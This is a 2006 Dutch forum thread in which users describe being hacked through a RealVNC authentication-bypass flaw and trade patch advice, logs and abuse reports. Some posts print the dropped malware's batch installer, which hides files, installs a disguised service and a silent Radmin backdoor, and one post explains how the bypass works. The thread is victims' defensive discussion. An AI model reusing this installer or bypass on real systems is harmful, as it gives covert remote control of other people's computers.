RealVNC security flaw waarschuwing - Privacy en beveiliging

zondag 21 mei 2006 18:24

Acties:

0 Henk 'm!

Topicstarter

Tsjonge het is niet te geloven er is een toch nog een onverlaat op mijn PC binnen gekomen. Terwijl ik een hardware firewall heb, en Kerio Personal Firewall en Symantec Antivirus op mijn PC. Vanmorgen liep ik langs mijn PC die meestal aanstaat en zag er toevallig iemand remote op werken. Er werd via IE een exe gedownload. Ik probeerde op cancel te drukken en die gast maar dat windowtje verplaatsen zodat ik steeds miste, een muisgevecht dus, kolderiek.. Meteen het netwerk eruit getrokken.

Ik snapte er niks van hoe kon mij dat nou overkomen. Nou gewoon, slordigheidje dus. Ik moest een tijdje terug even vanuit mijn werk op mijn PC thuis dus had poort 5900 doorgezet naar mijn PC. Precies, de winvnc poort. En vergeten weer dicht te zetten! Er zat wel een wachtwoord op maar dat helpt niks meer als je RealVNC gebruikt. Er is onlangs een echt heel erge fout in RealVNC geconstateerd:

A "highly critical" flaw in RealVNC's virtual network computing software could allow malicious hackers to access a remote system without a password, according to a published advisory. RealVNC, the Cambridge, U.K.-based company that invented the open-source software, has acknowledged the flaw and posted patches for all affected versions

Dus, als je RealVNC heb draaien richting internet, meteen naar hun website en versie 4.1.2 downloaden!

Mocht je nieuwsgierig zijn wat die cracker aan het downloaden was, ik denk dat het een rootkit is. Dit is het pad naar de exe, voorzichtig ermee.

*knip*

(regels aan elkaar plakken)

Norton detecteert het trouwens wel gewoon dus dat was niet gelukt bij mij. Maar je staat toch raar te kijken

Ik hoop dat ik er op tijd bij was.

[ Voor 5% gewijzigd door pasta op 21-05-2006 19:18 ]

zondag 21 mei 2006 18:39

Acties:

0 Henk 'm!

moto-moi

Ja, ik haat jou ook :w

quote: http://secunia.com/advisories/20107/
Description:
Steve Wiseman has reported a vulnerability in RealVNC, which can be exploited by malicious people to bypass certain security restrictions.

The vulnerability is caused due to an error within the handling of VNC password authentication requests. This can be exploited to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password.

The vulnerability has been reported in version 4.1.1. Other versions may also be affected.

Note: Version 4.0 is reportedly not affected.

Solution:
Update to Free Edition version 4.1.2 or Personal Edition/Enterprise Edition version 4.2.3.
http://www.realvnc.com/download.html

Provided and/or discovered by:
Steve Wiseman

Is toch (in ieder geval bij mij

) bekend vanaf 15 Mei ?

God, root, what is difference? | Talga Vassternich | IBM zuigt

zondag 21 mei 2006 18:54

Acties:

0 Henk 'm!

Henk007

RwinG schreef op zondag 21 mei 2006 @ 18:24:
Mocht je nieuwsgierig zijn wat die cracker aan het downloaden was, ik denk dat het een rootkit is. Dit is het pad naar de exe, voorzichtig ermee.

Inderdaad een backdoor
Dit zegt Kaspersky:
Scanned file: ** filenaam ** - Infected
** filenaam **/data.rar/archive comment - OK
/data.rar/drvcc32.ini - OK
/data.rar/lspool.ini - OK
/data.rar/path.bat - OK
/data.rar/lspool.exe - infected by Backdoor.Win32.HacDef.f
/data.rar/spools.exe - OK
/data.rar/drvcc32.dll - OK
/data.rar/spools.dll - OK
/data.rar/spools.dat - OK

Ik zou de link maar weghalen. Aan het verspreiden van malware doen we hier niet mee.

[ Voor 14% gewijzigd door Henk007 op 21-05-2006 19:23 ]

zondag 21 mei 2006 19:07

Acties:

0 Henk 'm!

Pascal

het installeerd een Serv-u FXP server...

als je de bestanden bekijkt in notepad etc...

Poorten wat het tooltje gebruikt
TCP:60800,45000,8277
UDP:60800,45000,8277

het maakt deze bestanden (mappen) aan
md "%systemroot%\system32\spool\PRINTERS\Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}\FXP\FXP.Area\racedir.01\00 _ aPoCalYpSe FXP Server _ ^ Hacked by eXiLe"
md "%systemroot%\system32\spool\PRINTERS\Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}\FXP\FXP.Area\racedir.02\00 _ aPoCalYpSe FXP Server _ ^ Hacked by eXiLe"
md "%systemroot%\system32\spool\PRINTERS\Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}\FXP\FXP.Area\racedir.03\00 _ aPoCalYpSe FXP Server _ ^ Hacked by eXiLe"
md "%systemroot%\system32\spool\PRINTERS\Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}\FXP\FXP.Area\racedir.04\00 _ aPoCalYpSe FXP Server _ ^ Hacked by eXiLe"
md "%systemroot%\system32\spool\PRINTERS\Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}\FXP\FXP.Area\racedir.05\00 _ aPoCalYpSe FXP Server _ ^ Hacked by eXiLe"

bedankt voor de tip kan meteen ff al me VNC clients servers updaten

[ Voor 4% gewijzigd door Pascal op 21-05-2006 19:08 ]

zondag 21 mei 2006 19:18

Acties:

0 Henk 'm!

pasta

Ondertitel

Ik heb toch even de URL weggesloopt, hoewel het niet klikbaar werd gemaakt blijft het toch verraderlijk, vooral omdat de complete payload van het bestand niet bekend is.

Signature

zondag 21 mei 2006 19:28

Acties:

0 Henk 'm!

L0g0ff

omg

Ik had hier laatst idd ook wat over gelezen. Maar dat het zo gevoelig was wist ik ook nog niet.

VNC gebruik ik zakelijk en prive gigantisch vaak om mensen een beetje op weg te kunnen helpen. Dat wordt toch flink patchen de volgende week.

Blog.wapnet.nl KompassOS.nl

zondag 21 mei 2006 21:39

Acties:

0 Henk 'm!

Verwijderd

OhMyGod schreef op zondag 21 mei 2006 @ 19:28:
VNC gebruik ik zakelijk en prive gigantisch vaak om mensen een beetje op weg te kunnen helpen. Dat wordt toch flink patchen de volgende week.

Onder Windows XP en Windows 2003 heb je de beschikking over RDP, maak gebruik van deze feature, dat is veiliger dan VNC (zover ik weet).

Dan komt er nog eens bij kijken, dat je alle high-access services bv in een VPN hangt, zodat dit niet eens kan voorkomen. VNC, RDP, en alle andere services die de mogenlijkheid hebben om "volledige toegang" te voorzien vanaf internet vallen hier dus onder.

Ik heb op mijn netwerk enkel poort 80 (HTTP) en 22 (SSH) open staan. De overige services zijn voor mij benaderbaar via een SSH tunnel, zodat andere mensen er gewoon niet op kunnen.

Vertrouw niemand, vertrouw geen enkel programma, vertrouw niets! Een dicht netwerk, is een veilig netwerk.

zondag 21 mei 2006 21:47

Acties:

0 Henk 'm!

RwinG

Topicstarter

pasta schreef op zondag 21 mei 2006 @ 19:18:
Ik heb toch even de URL weggesloopt, hoewel het niet klikbaar werd gemaakt blijft het toch verraderlijk, vooral omdat de complete payload van het bestand niet bekend is.

Ok. Als er toch een nieuwsgierige tweaker is die wil weten wat voor dreigingen je zoal in het echt tegen komt, laat maar weten. Ik heb hier die FXP server met ingebouwde Hacker Defender rootkit nog ergens liggen

Mocht je door een dergelijke FTP server met Hacker Defender besmet zijn dan kan dit helpen:
http://bagpuss.swan.ac.uk/comms/hxdef.htm

Ik ben even rond gaan zoeken en je kunt die rootkits zo van internet plukken. Maar daar gaan we dan maar even niet op in hier.

maandag 22 mei 2006 22:13

Acties:

0 Henk 'm!

Fairy

13kWp

Hoppa, ik had vandaag ook iemand die op mijn VNC wilde inloggen!

Helaas het IP niet kunnen zien op tijd, begon met 80 dacht ik.
Heb VNC zo ingesteld dat ie 3 seconden wacht voordat het loginscherm komt, op het scherm krijg ik dan een popup.

Ik gebruik de laatste UltraVNC en log nog wel eens in vanuit werk. UltraVNC er toch maar af kieperen?

maandag 22 mei 2006 22:18

Acties:

0 Henk 'm!

Zwerver

Nee, ik zou gewoon een perl-scriptje zoals deze draaien dan weet je direct of je VNC vulnerable is. Daarbij is er allang een update, dus waarom zou je UltraVNC verwijderen? Gewoon updaten die handel!

Woonachtig Down Under. Ik negeer je insults niet, maar tegen de tijd dat ik ze lees zijn ze meestal niet relevant meer

maandag 22 mei 2006 22:24

Acties:

0 Henk 'm!

Fairy

13kWp

Zwerver schreef op maandag 22 mei 2006 @ 22:18:
Nee, ik zou gewoon een perl-scriptje zoals deze draaien dan weet je direct of je VNC vulnerable is. Daarbij is er allang een update, dus waarom zou je UltraVNC verwijderen? Gewoon updaten die handel!

leuk maar hoe draai ik een perl scriptje

maandag 22 mei 2006 22:42

Acties:

0 Henk 'm!

Zwerver

Perl installeren op je windowspc: http://www.perl.com/download.csp#win32

En daarna gewoon compilen

Beetje googlen doet wonderen

Woonachtig Down Under. Ik negeer je insults niet, maar tegen de tijd dat ik ze lees zijn ze meestal niet relevant meer

dinsdag 23 mei 2006 09:13

Acties:

0 Henk 'm!

Fairy

13kWp

Zwerver schreef op maandag 22 mei 2006 @ 22:42:
Perl installeren op je windowspc: http://www.perl.com/download.csp#win32

En daarna gewoon compilen Beetje googlen doet wonderen

Laat maar zitten...

Niet iedereen is een programmeur die alles kan en weet.

[ Voor 11% gewijzigd door Fairy op 23-05-2006 09:14 ]

dinsdag 23 mei 2006 11:23

Acties:

0 Henk 'm!

Zwerver

Fairy schreef op dinsdag 23 mei 2006 @ 09:13:
[...]

Laat maar zitten...

Niet iedereen is een programmeur die alles kan en weet.

Dat zeg ik ook niet

Ik wijs je naar de installatiebinary en ik zeg daarnaast dat je even moet googlen om te kijken hoe je het verder moet aanroepen

Ik heb geen Windows, dus ik zou niet exact weten hoe je het moet doen

Niks ten nadele van je hoor

Woonachtig Down Under. Ik negeer je insults niet, maar tegen de tijd dat ik ze lees zijn ze meestal niet relevant meer

dinsdag 23 mei 2006 21:47

Acties:

0 Henk 'm!

SjOuKeS

HmmmmPie!!!!

2 pc's van mij die niet op IP waren vast gezet met VNC zijn ook gehacked..
Heb het bestand kunnen achterhalen waar de hacks inzaten (eVolite.exe)..
SFX (RAR) image met silent en autoinstall tag's
Het staat (nog steeds) gehost bij een members.home.nl account.
Heb @home zondag verwittigd van dit gebeuren via abuse maar natuurlijk is hier nog niks mee gedaan. Stukje (batch) code voor de geinteresseerden..

Files

code:

23-05-2006  21:43    <DIR>          .
23-05-2006  21:43    <DIR>          ..
07-09-2001  15:00           273.901 scardupd.exe
07-09-2001  15:00            28.672 srv.exe
07-09-2001  15:00            16.821 wrt.acx
23-05-2005  17:51         1.628.184 dhcpcl.exe
07-09-2001  15:00             1.792 install.bat
07-09-2001  15:00            34.304 rgv.exe

code:

md %windir%\system32\dhcp
move wrt.acx %windir%\system32\dhcp
move dhcpcl.exe %windir%\system32\dhcp
move scardupd.exe %windir%\system32
move trkupd.exe %windir%\system32
attrib +h +s -r %windir%\system32\dhcp
attrib +h +s -r %windir%\system32\dhcp\dhcpcl.exe
attrib +h +s -r %windir%\system32\dhcp\wrt.acx
attrib +h +s -r %windir%\system32\scardupd.exe
attrib +h +s -r %windir%\system32\trkupd.exe
srv install SCardUpd /n:"Smart Card Updater" /b:%windir%\system32\scardupd.exe /u:localsystem /s:auto /i:yes
rgv -addkey \HKLM\SYSTEM\RAdmin
rgv -addkey \HKLM\SYSTEM\RAdmin\v2.0
rgv -addkey \HKLM\SYSTEM\RAdmin\v2.0\Server
rgv -addkey \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters
rgv -addkey \HKLM\SOFTWARE\RAdmin
rgv -addkey \HKLM\SOFTWARE\RAdmin\v1.01
rgv -addkey \HKLM\SOFTWARE\RAdmin\v1.01\ViewType
rgv -set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
rgv -set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port=3b0d0000
rgv -set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter=ae51eaa4c93559b753a42274aafe45ac
rgv -set REG_BINARY \HKLM\SOFTWARE\RAdmin\v1.01\ViewType\Data=01f699b0575c1380186ff3fc68838ebfca4a9c5eccf98e7c3172ae28315e990b9fa48961fc0ce34750e30608f0552b80b3d4c0a8153627f05f8ef7b0f5b04bdb
rgv -set REG_EXPAND_SZ "\HKLM\SYSTEM\CurrentControlSet\Services\SCardUpd\ImagePath=%windir%\system32\scardupd.exe /service"
rgv -set REG_SZ "\HKLM\SYSTEM\CurrentControlSet\Services\SCardUpd\Description=Provides updates for legacy smart card readers attached to the computer."
%windir%\system32\dhcp\dhcpcl.exe -install
%windir%\system32\trkupd.exe -:installonly
srv start dhcpcl
srv start scardupd
srv start trkupd
del msg.txt
del rgv.exe
del evolite.exe
del script.vbs
del srv.exe
del install.bat

Eens geinstalleerd installed hij nog 3 services die ik na veel zoeken kon verwijderen dmv verschillende tools van sysinternals.
Nog steeds zit ik met gehookte dll's maar de serv-u server die geinstalleerd word is in iedergeval niet meer actief. En word er (volgens TCPmon) niet meer geluisterd op de verschillende poorten..

[ Voor 13% gewijzigd door SjOuKeS op 23-05-2006 21:51 ]

dinsdag 23 mei 2006 22:43

Acties:

0 Henk 'm!

RwinG

Topicstarter

Intussen bleef ik een kriebelig gevoel hebben -- hoe veel mensen hebben mijn desktop voor hun neus gehad?? Ik moest voor wat anders in de Application event log zijn en tsjonge, RealVNC logt daar alle connecties!

Afbeeldingslocatie: http://img210.imageshack.us/img210/4103/realvnchacked9up.gif

Afbeeldingslocatie: http://img210.imageshack.us/img210/4103/realvnchacked9up.gif

Je ziet steeds connecties die opgebouwd worden en direkt weer afgebroken. Dat zijn lui die geprobeerd hebben om via de VNC poort binnen te komen maar het password niet wisten. De bovenste, die heeft dus 3,5 minuut de tijd gehad om aan te rommelen maar gelukkig zag ik hem. In de properties van dit event staat:

Connections: closed: 80.178.137.11::4737 (read: Connection reset by peer (10054))

"reset bij peer" .. inderdaad de netwerkkabel eruit gerukt

En verder is er dus niemand binnengeweest - geen schade dus! Het is trouwens een Italiaans IP nummer: 80.178.137.11.adsl.012.net.il [80.178.137.11]

[ Voor 13% gewijzigd door RwinG op 23-05-2006 22:46 ]

dinsdag 23 mei 2006 23:24

Acties:

0 Henk 'm!

Rob

Ik heb even zitten googlen: alleen realvnc (en niet alle oude versies) heeft dit probleem. Ultra en tightvnc zijn safe.
http://www.intelliadmin.c...-flaw-in-realvnc-411.html

In the beginning the Internet was a bunch of smart users with dumb terminals. Now...

dinsdag 23 mei 2006 23:44

Acties:

0 Henk 'm!

hawk88

lijkt meer op een Iraelisch IP

code:

 This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Note: the default output of the RIPE Whois server
% is changed. Your tools may need to be adjusted. See
% http://www.ripe.net/db/news/abuse-proposal-20050331.html
% for more details.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '80.178.131.0 - 80.178.142.255'

inetnum:    80.178.131.0 - 80.178.142.255
netname:    GOLDENLINES-ADSL
descr:          Please Send Abuse/SPAM complaints To Abuse@012.net.il
country:    IL
admin-c:    DR5299-RIPE
tech-c:     DR5299-RIPE
status:     ASSIGNED PA
mnt-by:     AS9116-MNT
mnt-lower:  AS9116-MNT
source:     RIPE # Filtered

role:           DNS REG
address:        25 Hsivim st. Petach-Tiikva, Israel
admin-c:        KI373-RIPE
tech-c:         AG914-RIPE
tech-c:         KI373-RIPE
nic-hdl:        DR5299-RIPE
mnt-by:         AS9116-MNT
source:         RIPE # Filtered
abuse-mailbox:  abuse@012.net.il

% Information related to '80.178.137.0/24AS9116'

route:          80.178.137.0/24
descr:          Golden Lines
origin:         AS9116
mnt-by:         AS9116-MNT
source:         RIPE # Filtered

dinsdag 23 mei 2006 23:46

Acties:

0 Henk 'm!

Fairy

13kWp

Bij mij probeert een 87.106.4.206 steeds te connecten. Is nu al 2 dagen bezig. Nog effe en ik ga die provider een abusemail sturen.

woensdag 24 mei 2006 00:06

Acties:

0 Henk 'm!

RwinG

Topicstarter

hawk88 schreef:
lijkt meer op een Iraelisch IP

Ach ja inderdaad, geen .it maar .il - ik moet mijn lenzen schoonmaken

Fairy schreef:
Bij mij probeert een 87.106.4.206 steeds te connecten. Is nu al 2 dagen bezig. Nog effe en ik ga die provider een abusemail sturen.

Domein naam is s15210515.onlinehome-server.info en er draait een IE webserver en een FTP server. Geen anonieme toegang trouwens

"schlund+partner" als provider.. hoe is je Duits ??

Edit: En via die link van Zwerver vind je een Perl script waar je mee kunt scannen. Ik neem aan dat dit nu wijdverbreid door scriptkiddies gedraaid wordt. Dan vind je steeds connects en disconnects in de log neem ik aan.

Het veiligheidsgat is echt knullig naar ik begrijp, zie Perl script. De client en de server onderhandelen over de authenticatie, dus de manier waarop de beveiliging wordt toegepast. Als je nu een client maakt die aangeeft dat hij alleen maar authenticatie type '0000' ondersteund dan zegt RealVNC server "ok, die krijg je". Alleen jammer dat '0000' staat voor geen authenticatie. Dus dan kom je zonder password binnen! Kwestie dus van de source wat aanpassen, opnieuw compileren en je hebt een viewer die op al deze brakke RealVNC servers die je net met de Perl scanner hebt gevonden binnen kan komen.

[ Voor 43% gewijzigd door RwinG op 24-05-2006 00:15 ]

donderdag 25 mei 2006 20:54

Acties:

0 Henk 'm!

S-Cript

Dinsdag op woensdag had ik er 1tje,
door een onvoorziene herstart stond VNC ook weer eens aan,

en ja hoor we hebben een 'oetlul' die deze 'exploit' wilt testen.

Event Type: Information
Event Source: WinVNC4
Event Category: None
Event ID: 1
Date: 24-5-2006
Time: 1:46:23
User: N/A
Computer: PC-BOVEN
Description:
Connections: accepted: 84.41.137.23::48752

ipv alleen testen,vond deze persoon het aangenaam om 300 uur aan digitaliseren
van Muziekcassettes te verwijderen,
gelukkig door recoverysoftware+een recente backup heb ik 250 uur kunnen redden.

mailtje naar abuse@speedlinq leverde mij een mail naar XB op.
en laat XB nu net de provider zijn ,waar de holding,waar ik werkzaam voor ben,een
mega contract hebben en ik meerdere malen per maand in gesprek ben met dit aardige bedrijf,
maandag eens bellen om te kijken of we via een andere kant deze persoon eens kunnen
'screwen'

niets bijzonders

vrijdag 26 mei 2006 00:40

Acties:

0 Henk 'm!

80000

mrox

S-Cript schreef op donderdag 25 mei 2006 @ 20:54:
Dinsdag op woensdag had ik er 1tje,
door een onvoorziene herstart stond VNC ook weer eens aan,

en ja hoor we hebben een 'oetlul' die deze 'exploit' wilt testen.

Event Type: Information
Event Source: WinVNC4
Event Category: None
Event ID: 1
Date: 24-5-2006
Time: 1:46:23
User: N/A
Computer: PC-BOVEN
Description:
Connections: accepted: 84.41.137.23::48752

'screwen'

Precies dezelfde IP adres, heeft ook bij mij huisgehouden en mijn data bestanden verwijderd.
Zal morgen ook een mail naar speedlinq sturen.

vrijdag 26 mei 2006 15:43

Acties:

0 Henk 'm!

itsalex

Ik zie het al jaren dat ze bij een klant van mij bezig zijn om in te breken en ook vanuit Italie. ik heb nu voor het eerst gehoord van een klant. Die heeft mij vannacht om 3.30 gebeld of ik bezig was maar ik kon niets ontdekken op het systeem. Maar een andere server heeft er steeds last van. Ik weet niet hoe ik het moet ontmoedigen. Ik heb wel een wachtwoord en een NT wachtwoord erop gezet dus verder dan dat kom je niet.

[ Voor 10% gewijzigd door itsalex op 26-05-2006 15:44 ]

I hit the CTRL key, but I'm still not in control!

zaterdag 27 mei 2006 12:33

Acties:

0 Henk 'm!

duhtje

blabla

Ik had precies hetzelfde. Een uur geleden zat ik op mijn pc te werken en ineens begon de muis te bewegen. VNC gaf aan dat er iemand op mijn systeem zat te werken. Direct netwerk uitgeschakeld. Bleek dat de gast vannacht zelfs mijn virusscanner al had verwijderd.

Nou ja, snel de nieuwe versie installeren en hopelijk gebeurd het niet nog eens ;-)

Wel balen... nu moet ik wegens veiligheidsoverwegingen al mijn wachtwoorden aanpassen

zaterdag 27 mei 2006 12:47

Acties:

0 Henk 'm!

axis

itsalex schreef op vrijdag 26 mei 2006 @ 15:43:
Ik zie het al jaren dat ze bij een klant van mij bezig zijn om in te breken en ook vanuit Italie. ik heb nu voor het eerst gehoord van een klant. Die heeft mij vannacht om 3.30 gebeld of ik bezig was maar ik kon niets ontdekken op het systeem. Maar een andere server heeft er steeds last van. Ik weet niet hoe ik het moet ontmoedigen. Ik heb wel een wachtwoord en een NT wachtwoord erop gezet dus verder dan dat kom je niet.

In de firewall alleen die hosts toestaan die erop moeten kunnen? En als het een standalone windows bak is, en er geen firewall voor staat, of die jij niet beheert, kun je ook nog een ipsec filter op die machine zelf zetten om port filtering te doen.. Kun je het zelf in de hand houden.

Two advices for network troubleshooting.. learn to draw diagrams in Visio, and THINK IN LAYERS!

maandag 29 mei 2006 12:59

Acties:

0 Henk 'm!

S-Cript

Aller eerst is het natuurlijk erg vervelend dat er is ingebroken op uw pc
door een fout in de software die u gebruikt.

Helaas is het zo dat u zelf aangifte dient te doen bij de politie. De
politie kan u verder helpen met de vervolg stappen. Alle zij kunnen via de
officier van justitie gegevens opvragen bij ons betreffende de computer inbraak
bij u thuis.

Wij kunnen u helaas niet helpen met dit probleem.

Met vriendelijke groet,
XB
--------------------------------------------------

leuk,eerst een mail naar speedlinq,die doorwijst naar XB, en er niets mee doet..
na ja de aangifte gaat vanmiddag bij de politie naar binnen..
speedlinq heeft opnieuw mijn klacht,nu telefonisch aangenomen,en zullen er naar kijken

donderdag een afspraak met de politie,om de aangifte officieel te bekrachten

[ Voor 15% gewijzigd door S-Cript op 29-05-2006 13:50 ]

niets bijzonders

donderdag 1 juni 2006 17:57

Acties:

0 Henk 'm!

S-Cript

Zojuist heeft de politie mijn verklaring opgenomen en tevens heb ik alle
informatie richting deze speedlinq -klant overgedragen..

blijkt dat het wetboek meer up 2 date is dan ik dacht..
een waslijst aan artikelen heeft deze persoon overteden waar op zn minst een geldboete voor staat
en anders 2 jaar celstraf

nu maar hopen dat iedereen aangifte tegen dit soort gasten doet.
wordt het internetten weer een stuk vriendelijker

niets bijzonders

donderdag 1 juni 2006 21:27

Acties:

0 Henk 'm!

Fairy

13kWp

S-Cript schreef op donderdag 01 juni 2006 @ 17:57:
Zojuist heeft de politie mijn verklaring opgenomen en tevens heb ik alle
informatie richting deze speedlinq -klant overgedragen..

blijkt dat het wetboek meer up 2 date is dan ik dacht..
een waslijst aan artikelen heeft deze persoon overteden waar op zn minst een geldboete voor staat
en anders 2 jaar celstraf

nu maar hopen dat iedereen aangifte tegen dit soort gasten doet.
wordt het internetten weer een stuk vriendelijker

Goed bezig!

Laat ons even weten wat er uit gekomen is!

donderdag 1 juni 2006 21:40

Acties:

0 Henk 'm!

--WaaZaa--

Ook ik kwam er ineens achter dat men al 2 weken via de exploit op mn pc aan het rondneuzen waren. Werd een ochtend wakker, waarin allemaal msn gesprekken openstonden waarin in "mother fucker" tegen iedereen zou hebben gezegd...

Ik denk van "heb ik echt zoveel gezopen gisteravond??

" en daarna dacht ik meteen dat mn broertje even leuk had lopen doen

. Denk zal is vragen hoe laat ze dat allemaal ontvangen hebben, was het om 5 uur sochtend's

Iedereen slaapt dus nog..

Denk zal toch is even in de logs kijken, ja hoor, al 2 weken lang allerlei IP-adressen die voor korte of langere tijd op mn pc bezig waren

Ik dacht eerst mn wachtwoord ergens te hebben laten slingeren, tot een klasgenoot me van mij van de exploit vertelde. Toen dus maar even vanaf school geprobeerd de exploit na te doen, een uur later zie ik ineens mn bureaublad op de pc naast me

Toch maar even de VNC server uitgezet....

Overigens waren het bij mij overwegend duitse en amerikaanse IP adressen. Heb gelukkig alleen nergens last van, ook geen verloren data of iets dergelijks.. Alleen een paar boze mensen over msn vanwege het gescheld, ag jah.

prutsert

zaterdag 3 juni 2006 20:18

Acties:

0 Henk 'm!

RwinG

Topicstarter

--WaaZaa-- schreef op donderdag 01 juni 2006 @ 21:40:Heb gelukkig alleen nergens last van, ook geen verloren data of iets dergelijks.. .

De kans is groot dat je een rootkit hebt opgelopen waardoor je PC nog steeds open staat maar dat kun je vanuit windows dan niet eens meer zien...

Nog een aardige link gevonden: http://members.home.nl/rolfhobby/Wat-is-Rootkits.html

zaterdag 3 juni 2006 20:42

Acties:

0 Henk 'm!

Phyxion

_/-\o_

S-Cript schreef op maandag 29 mei 2006 @ 12:59:
Aller eerst is het natuurlijk erg vervelend dat er is ingebroken op uw pc
door een fout in de software die u gebruikt.

Helaas is het zo dat u zelf aangifte dient te doen bij de politie. De
politie kan u verder helpen met de vervolg stappen. Alle zij kunnen via de
officier van justitie gegevens opvragen bij ons betreffende de computer inbraak
bij u thuis.

Wij kunnen u helaas niet helpen met dit probleem.

Met vriendelijke groet,
XB
--------------------------------------------------

leuk,eerst een mail naar speedlinq,die doorwijst naar XB, en er niets mee doet..
na ja de aangifte gaat vanmiddag bij de politie naar binnen..
speedlinq heeft opnieuw mijn klacht,nu telefonisch aangenomen,en zullen er naar kijken

donderdag een afspraak met de politie,om de aangifte officieel te bekrachten

Het is wel leuk en aardig wat je doet, maar ik kan je met 90% zekerheid zeggen dat je nu een bedrijf of proxy hebt aangegeven. Een goede hacker werkt namelijk altijd via een andermans PC, onder andere via bedrijven, of via een proxyserver. Zo blijft diegene zelf altijd buiten schot. Ach, en de politie zal denk ik echt niks doen hoor, als die één klacht binnen krijgen (Van een buitenlands IP adres nog wel), zullen die heus niet contact op gaan nemen met een buitenlandse politie, laat staan dat die er wat aan gaan doen.
Sad, but true...

'You like a gay cowboy and you look like a gay terrorist.' - James May

zaterdag 3 juni 2006 20:51

Acties:

0 Henk 'm!

--Christiaan--

Ik had even een vraagje, waar kan ik deze logs vinden? Heb namelijk sinds 2 dagen ook RealVNC draaien.

zaterdag 3 juni 2006 20:54

Acties:

0 Henk 'm!

Phyxion

_/-\o_

--Christiaan-- schreef op zaterdag 03 juni 2006 @ 20:51:
Ik had even een vraagje, waar kan ik deze logs vinden? Heb namelijk sinds 2 dagen ook RealVNC draaien.

Configuratiescherm->Systeembeheer->Logboeken->Toepassing

Maar als je logs disabled hebt/of niet enabled hebt, logt ie niks.

'You like a gay cowboy and you look like a gay terrorist.' - James May

dinsdag 20 juni 2006 12:54

Acties:

0 Henk 'm!

poktor

Zwerver schreef op maandag 22 mei 2006 @ 22:42:
Perl installeren op je windowspc: http://www.perl.com/download.csp#win32

En daarna gewoon compilen Beetje googlen doet wonderen

Klopt, na installatie van Perl hoef je zo'n scriptje eigenlijk alleen nog maar te dubbelklikken.. kind kan de was doen..